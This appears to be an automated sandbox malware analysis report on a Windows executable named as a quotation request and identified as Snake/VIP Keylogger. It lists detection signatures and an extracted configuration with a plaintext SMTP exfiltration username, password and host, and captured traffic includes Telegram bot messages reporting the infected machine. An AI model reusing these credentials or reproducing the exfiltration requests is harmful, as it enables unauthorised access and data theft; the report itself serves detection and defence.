Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Overview

General Information

Sample name: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe
Analysis ID: 1560113
MD5: 1ae7a890014eba9c807c6adeabac7671
SHA1: e3b92645849a3e064d9fc401badf115dab013839
SHA256: bba1825bd893328442cb891a35420a5da41a5431d1ade643f085c5992e763d3a
Tags: exeuser-TeamDreier
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection
barindex
Found malware configuration
Source: 00000009.00000002.3829829868.00000000030D1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587", "Version": "4.4"}
Source: 9.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.400000.0.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "katiavicente@catanhoinvestments.com", "Password": "RPgi34L1yoc", "Host": "mail.catanhoinvestments.com", "Port": "587"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe ReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe ReversingLabs: Detection: 52%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0741AF54h 0_2_0741B66D
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F2C0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F52F
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162F45Dh 9_2_0162F4AC
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 0162FC19h 9_2_0162F961
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE2DC8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE0D0Dh 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE1697h 9_2_06DE0B30
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE2C19h 9_2_06DE2968
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE959h 9_2_06DEE6B0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE0A9h 9_2_06DEDE00
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEF209h 9_2_06DEEF60
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DECF49h 9_2_06DECCA0
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE2DC2
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DED7F9h 9_2_06DED550
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEE501h 9_2_06DEE258
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEF661h 9_2_06DEF3B8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEEDB1h 9_2_06DEEB08
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DED3A1h 9_2_06DED0F8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_06DE0040
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEFAB9h 9_2_06DEF810
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DEDC51h 9_2_06DED9A8
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe Code function: 4x nop then jmp 06DE31E0h 9_2_06DE310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269F45Dh 14_2_0269F2D3
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269F45Dh 14_2_0269F4AC
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0269FC19h 14_2_0269F974
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06550D0Dh 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06551697h 14_2_06550B30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 06552C19h 14_2_06552968
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_06552DC8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E501h 14_2_0655E258
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550673
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E0A9h 14_2_0655DE00
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655E959h 14_2_0655E6B0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655F209h 14_2_0655EF60
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655EDB1h 14_2_0655EB08
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655F661h 14_2_0655F3B8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550853
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 14_2_06550040
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655FAB9h 14_2_0655F810
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655D3A1h 14_2_0655D0F8
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655CF49h 14_2_0655CCA0
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655D7F9h 14_2_0655D550
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_0655310E
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 065531E0h 14_2_06552DC2
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe Code function: 4x nop then jmp 0655DC51h 14_2_0655D9A8

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.418efd8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.414bbb8.2.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49749 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49720 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49757 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49741 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49740 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49734 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49751 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49748 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49767 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49775 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49828 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49764 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49797 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49806 -> 188.114.97.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49727 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49742 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2014:24:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2022/11/2024%20/%2011:49:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
